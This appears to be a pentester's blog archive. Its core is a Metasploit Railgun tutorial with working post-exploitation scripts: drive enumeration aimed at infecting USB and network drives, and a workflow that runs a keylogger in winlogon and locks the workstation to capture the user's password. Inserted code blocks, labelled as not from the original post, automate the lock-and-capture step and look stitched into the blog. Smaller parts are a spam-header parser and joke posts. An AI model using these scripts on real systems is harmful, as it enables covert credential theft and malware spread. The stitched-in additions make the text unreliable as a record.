
Tuesday, September 06, 2011

Post Exploitation Command Lists

I’ve had a private list of commands that I run on Windows or Linux when I pop a shell, as I’m sure most pentesters do. It isn’t so much a matter of hoarding as it is just jumbled notes that were ‘not worth posting’.

Well, I made two (now three) public Google Docs that anyone can edit, subject to a *don’t be a dick clause.



Both have filled out A LOT since I first posted them, but if you have that one trick command you’d like to share, or just want to copy/print the list for your own use, that’s fine too. I plan to keep these publicly editable as long as people obey the DBAD clause.

If you don’t know any cool commands but happen to be a tech writer and can make it look beautiful, then great! Please do. There are tables at the bottom that I want to move everything to, or something like it, but if you can do it better…

Anyways, look forward to seeing how this thing grows.

Wednesday, July 07, 2010

Intro to RailGun: WIN API for Meterpreter


Back on June 13th, “Patrick HVE” released RAILGUN:

https://dev.metasploit.com/pipermail/framework/2010-June/006382.html

And it was merged into the Metasploit trunk in revisions 9709, 9710, 9711 and 9712.

Basically, what this allows you to do is make Windows API calls from Meterpreter without compiling your own DLL. It currently supports a number of Windows API DLLs by default:

  • iphlpapi
  • ws2_32
  • kernel32
  • ntdll
  • user32
  • advapi32

(You can find out exactly which functions are available by default in the api.rb file.)

It’s also very extensible: if it doesn’t have a DLL or function you need, you can add your own. You can read all about it in the manual:

./external/source/meterpreter/source/extensions/railgun/railgun_manual.pdf

Here are two examples where this comes in very handy:

List Drives:

The problem that I’ve had on a number of pentests is that you get a shell, but from CMD or Meterpreter there is no good way to find all of the volumes (drives) attached.

  • net use – Shows you which network drives are connected, but not physical ones
  • fsutil fsinfo drives – You must be an administrator to ride this train
  • fdisk /status – Only on OLD versions of DOS, not sure when this disappeared

But Railgun solves this problem with a really short script:

# Load the Railgun plugin  **_Update: You no longer need this step_**
# client.core.use("railgun")

# Make the API call to enumerate drive letters. GetLogicalDrives returns a
# bitmask: bit 0 = A:, bit 1 = B:, ... bit 25 = Z:
a = client.railgun.kernel32.GetLogicalDrives()["return"]
# Convert the bitmask to letters by testing each bit in turn
drives = []
letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
(0..25).each do |i|
	if ((a >> i) & 1) == 1
		drives << letters[i,1]
	end
end
print_line("Drives Available = #{drives.inspect}")

Output: Drives Available = ["A", "C", "D", "P", "X"]

Save this as a Meterpreter script and it will print every logical drive attached to the system, even as a limited user (at least, every drive that user can see).

Logical drives include hard disks, network drives, mass storage, optical drives, etc. This opens the door to infecting USB sticks and network drives…
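Since the whole point of the drive list is knowing which letters are USB sticks or network shares, here is an added example (mine, not code from the original post) that decodes the GetLogicalDrives bitmask the same way and then classifies each drive with GetDriveTypeA. Assumptions: GetDriveTypeA is present in Railgun’s kernel32 definitions on your version (add it per the Railgun manual if not), the return-code table follows the Win32 GetDriveType documentation, and the type lookup is passed in as a callable so the same code runs offline against a stub.

```ruby
# Added example (not from the original post). Decode the GetLogicalDrives()
# bitmask and classify each drive letter with GetDriveType so removable and
# network drives stand out from fixed disks.
#
# Assumption: client.railgun.kernel32.GetDriveTypeA exists in your Railgun
# kernel32 definitions. The return codes below are the documented Win32 values.
DRIVE_TYPES = {
  0 => "unknown",      # DRIVE_UNKNOWN
  1 => "no_root_dir",  # DRIVE_NO_ROOT_DIR (root path invalid / not mounted)
  2 => "removable",    # DRIVE_REMOVABLE   (USB stick, floppy)
  3 => "fixed",        # DRIVE_FIXED
  4 => "remote",       # DRIVE_REMOTE      (network share)
  5 => "cdrom",        # DRIVE_CDROM
  6 => "ramdisk",      # DRIVE_RAMDISK
}.freeze

# Bit i of the mask set => drive letter ('A'.ord + i) exists.
def decode_logical_drives(mask)
  (0..25).select { |i| ((mask >> i) & 1) == 1 }.map { |i| (65 + i).chr }
end

# drive_type_for is a callable taking a root path like "C:\" and returning the
# GetDriveType integer. On a live session pass the Railgun call; for offline
# use pass a stub. Returns { "C" => "fixed", ... }.
def drive_report(mask, drive_type_for)
  decode_logical_drives(mask).map do |letter|
    root = "#{letter}:\\"
    code = drive_type_for.call(root)
    [letter, DRIVE_TYPES.fetch(code, "unknown(#{code})")]
  end.to_h
end

# Live usage inside a Meterpreter script (assumed Railgun definitions):
#   mask = client.railgun.kernel32.GetLogicalDrives()["return"]
#   via_railgun = ->(root) { client.railgun.kernel32.GetDriveTypeA(root)["return"] }
#   drive_report(mask, via_railgun).each { |l, t| print_line("#{l}: #{t}") }

if __FILE__ == $0
  # Constructed sample: the post's own A, C, D, P, X set, with a stub type lookup.
  sample_mask = %w[A C D P X].sum { |l| 1 << (l.ord - 65) }
  stub = ->(root) { { "A:\\" => 2, "C:\\" => 3, "D:\\" => 5, "P:\\" => 4, "X:\\" => 2 }.fetch(root, 0) }
  drive_report(sample_mask, stub).each { |l, t| puts "#{l}: #{t}" }
end
```

The bit test replaces the modulo arithmetic from the script above with the same result; the injected lookup is what lets the decoding logic be checked without a target.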

JEDI KEYLOGGING:

One of the problems with keylogging is that you never know when that person will log in, and if you’re using a client-side exploit, they have probably already logged in and you’re left hoping they log into a portal or some other password-protected site.

Railgun to the rescue again:

# Start the keylogger running in the background, dumping keys every 15 seconds, attached to Winlogon:

meterpreter > bgrun keylogrecorder -c 1 -t 15
[*] Executed Meterpreter with Job ID 0
meterpreter >
[*] winlogon.exe Process found, migrating into 640
[*] Migration Successful!!
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf3/logs/scripts/keylogrecorder/192.168.92.122_20100707.4539.txt
[*] Recording

Drop to IRB to initialize Railgun and lock out the workstation, forcing the user to use their credentials again:

meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>> client.core.use("railgun")
=> true
>> client.railgun.user32.LockWorkStation()
=> {"GetLastError"=>0, "return"=>true}
>> exit
meterpreter >


Set up a “tail -f” on the keylogger’s log file, then kill the keylogger once you’ve gotten what you came for.

meterpreter > bglist
[*] Job 0: ["keylogrecorder", "-c", "1", "-t", "15"]
meterpreter > bgkill 0
[*] Killing background job 0...
meterpreter >
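The lock, tail and kill steps above are easy to wrap into one Meterpreter script. The following is an added example of mine, not code from the original post or from Metasploit. Assumptions: keylogrecorder has already been started with bgrun as shown and the log path it printed is passed in; client.railgun.user32.LockWorkStation is the Railgun call from the IRB session above; keylogrecorder writes Enter into the log as “<Return>” (assumed, adjust the marker if your version differs). Only lock_workstation needs a live session; the tailing runs anywhere, so the demo at the bottom uses a constructed log file.

```ruby
# Added example (not from the original post): the "Jedi keylogging" steps as
# one script. Assumes keylogrecorder is already running and its log path is
# known, and that Enter shows up in the log as "<Return>".
require "tempfile"

# LockWorkStation only works from a process on the interactive desktop with a
# logged-on, unlocked user, so check the result instead of assuming it locked.
# Returns true on success, false (and prints GetLastError) otherwise.
def lock_workstation(client)
  r = client.railgun.user32.LockWorkStation()
  return true if r["return"]
  warn "LockWorkStation failed, GetLastError=#{r["GetLastError"]}"
  false
end

# Return [lines appended since offset, new offset]. The log may not exist until
# keylogrecorder's first flush, so a missing file just means "nothing yet".
def tail_new_lines(path, offset)
  return [[], offset] unless File.exist?(path)
  size = File.size(path)
  return [[], offset] if size <= offset
  data = File.open(path, "rb") { |f| f.seek(offset); f.read(size - offset) }
  [data.lines.map(&:chomp), size]
end

# Poll the log every `interval` seconds (match keylogrecorder's -t) until a line
# containing `marker` appears or `timeout` seconds pass; returns all lines seen.
# `sleeper` is injectable so the loop can be exercised without real waiting.
def watch_keylog(path, marker: "<Return>", timeout: 300, interval: 15, sleeper: ->(s) { sleep(s) })
  offset = 0
  captured = []
  deadline = Time.now + timeout
  loop do
    lines, offset = tail_new_lines(path, offset)
    captured.concat(lines)
    return captured if lines.any? { |l| l.include?(marker) }
    return captured if Time.now >= deadline
    sleeper.call(interval)
  end
end

# Live usage in a Meterpreter script (log path comes from the bgrun output):
#   exit unless lock_workstation(client)
#   got = watch_keylog("/root/.msf3/logs/scripts/keylogrecorder/<ip>_<stamp>.txt")
#   got.each { |l| print_line(l) }
# then bgkill the keylogrecorder job.

if __FILE__ == $0
  # Offline demo with a constructed log: the fake "sleep" appends what the user would type.
  log = Tempfile.new("keylog")
  fake_user = ->(_secs) { File.open(log.path, "ab") { |f| f.write("Password1 <Return>\n") } }
  puts watch_keylog(log.path, sleeper: fake_user).inspect
end
```

Checking the LockWorkStation return matters more than it looks: if the session is sitting in a process that is not on the interactive desktop, the call quietly returns false and the user is never prompted, so you would be tailing an empty log.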

Hope you have fun with Railgun, and shoot me an email at mubix@hak5.org or leave a comment if you have any other crazy uses for Railgun.


Friday, August 05, 2005

USMC: Crack Down on Tats

(This is a joke) IN BREAKING NEWS: The Marine Corps has adopted the no Tat policy. In this bold move, it is dishonorably discharging 80% of its current personnel due to this new “Clean or Out” program.


Monday, August 01, 2005

Toilet Peril

One should never be made to make a decision such as the one I’m about to share with you. Where I work, there are two male restrooms. One is downstairs, still within ‘hurry’ distance, and the other is just across the hall. You are probably thinking, ‘Where is the decision in that?’ Well, this is where it gets interesting. Both are alright for number 1 traffic. No big deal, in and out. But number 2 is a different story. Here are the stats on both restrooms:

Upstairs: 3 stalls, one is out of order (Stall 2). Stall 1 never stops flushing (so when you wipe, your hand gets wet), Stall 3 will flush, so fast that it will actually make your pants wet.. no matter what.. (this thing gets distance) and the whole bathroom is pretty dirty. Although this bathroom is nice and warm. (See the next line for why this is an important statement)

Downstairs: 2 stalls, freezing cold, so cold that constipation is a natural reaction. On the upside, it is always clean and hardly anyone is ever in there so, if you are ‘loud’ you have the convenience. Again, it is down a flight of stairs.

Which would you choose?

Brute Force Spam

Here is the source of the email I got (new hacking style, brute force spamming):

From - Mon Aug 01 00:51:54 2005  
Received: from andylau.net (andylau-net.mr.outblaze.com [205.158.62.181])  
by cpe-066-056-247-120.ec.res.rr.com (Postfix) with ESMTP id CACB489394  
for <sgrduklhaergt@room362.com>; Sun, 31 Jul 2005 12:08:10 -0700  
From: "Pancakes O. Making" <riel@andylau.net>  
To: Sgrduklhaergt <sgrduklhaergt@room362.com>  
Subject: hi  
Date: Sun, 31 Jul 2005 12:08:10 -0700  
Message-ID: <001101c59603$b5b7b45d$2c4260db@andylau.net>  
MIME-Version: 1.0  
Content-Type: text/plain  
Content-Transfer-Encoding: 7bit  
X-Priority: 3 (Normal)  
X-MSMail-Priority: Normal  
X-Mailer: Microsoft Outlook, Build 10.0.2616  
Importance: Normal  
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000  
X-AntiVirus: OK! AntiVir MailGate Version 2.0.1; AVE: 6.15.0.0; VDF: 6.15.0.6  
X-RCPT-TO: <sgrduklhaergt@room362.com>  
Status: U  
X-UIDL: 412837401  
  
<b>hi dude! i just wanted to test your e-mail</b></i>  

Why would someone ‘test your email’ to an extremely random user?
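Lined up across a mail log, “hi” or “test” messages to random local-parts from the same relay are the signature of an address brute force (directory-harvest) run, and the headers above carry everything needed to spot one. Here is an added example of mine, not from the original post, that parses a raw header block like the one above and flags a recipient that does not exist locally. The header text is the one quoted in the post; the local domain and mailbox list are constructed for the example.

```ruby
# Added example (not from the original post): parse raw mail headers, pull out
# the relay IP, sender and recipient, and flag a recipient that is not a real
# mailbox, the pattern of an address brute force / directory-harvest probe.
# The header block is the one quoted in the post; the mailbox list is constructed.

SAMPLE_HEADERS = <<~'MAIL'
  Received: from andylau.net (andylau-net.mr.outblaze.com [205.158.62.181])
      by cpe-066-056-247-120.ec.res.rr.com (Postfix) with ESMTP id CACB489394
      for <sgrduklhaergt@room362.com>; Sun, 31 Jul 2005 12:08:10 -0700
  From: "Pancakes O. Making" <riel@andylau.net>
  To: Sgrduklhaergt <sgrduklhaergt@room362.com>
  Subject: hi
  Date: Sun, 31 Jul 2005 12:08:10 -0700
  Message-ID: <001101c59603$b5b7b45d$2c4260db@andylau.net>
  X-Mailer: Microsoft Outlook, Build 10.0.2616

  <b>hi dude! i just wanted to test your e-mail</b></i>
MAIL

# Header names are case-insensitive; folded continuation lines (leading
# whitespace) belong to the previous header; the first blank line ends the block.
def parse_headers(raw)
  headers = {}
  last = nil
  raw.each_line do |line|
    line = line.chomp
    break if line.strip.empty?
    if line.start_with?(" ", "\t") && last
      headers[last] = headers[last] + " " + line.strip
    elsif (m = line.match(/\A([\w-]+):\s*(.*)\z/))
      last = m[1].downcase
      headers[last] = m[2]
    end
  end
  headers
end

# The bracketed IP in Received is what the accepting MTA saw; the hostname in
# front of it is whatever the sender claimed in HELO, so trust the IP.
def relay_ip(received)
  m = received.match(/\[(\d{1,3}(?:\.\d{1,3}){3})\]/)
  m && m[1]
end

# "Display Name <user@host>" or a bare address -> "user@host"
def address_of(field)
  m = field.match(/<([^>]+)>/)
  (m ? m[1] : field).strip.downcase
end

# Summarize one message; unknown_recipient is true when the To address is in
# our domain but not in the list of mailboxes that actually exist.
def probe_report(raw, local_domain, known_mailboxes)
  h = parse_headers(raw)
  rcpt = address_of(h.fetch("to", ""))
  user, domain = rcpt.split("@", 2)
  {
    relay_ip: relay_ip(h.fetch("received", "")),
    sender: address_of(h.fetch("from", "")),
    recipient: rcpt,
    subject: h.fetch("subject", ""),
    unknown_recipient: domain == local_domain && !known_mailboxes.include?(user),
  }
end

if __FILE__ == $0
  puts probe_report(SAMPLE_HEADERS, "room362.com", %w[mubix webmaster postmaster]).inspect
end
```

Grouping these reports by relay_ip over a day of mail is the check that turns one odd message into a visible harvest attempt: many distinct unknown recipients from one address, all with one-word subjects.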

Def Con Resolutions

To celebrate the close of DefCon 13 here are my…

New Defcon (14) Resolutions.

  • Get l0gic a girl to take to Def Con
  • Get duder out to the east coast
  • Make and print Project Mentor T-Shirts to give away and wear to DefCon
  • Create a DCMar Group
  • Watch Family Guy and Futurama episodes as instructed by l0gic
  • Get BFA w/ Card

Sunday, July 31, 2005

Air Force Infantry Discovered

I have officially uncovered the US Air Force’s TOP SECRET plans at making a deadly infantry. The following image was stolen from a secret base in Roswell. I will stay with this story as long as it takes to unveil the truth.
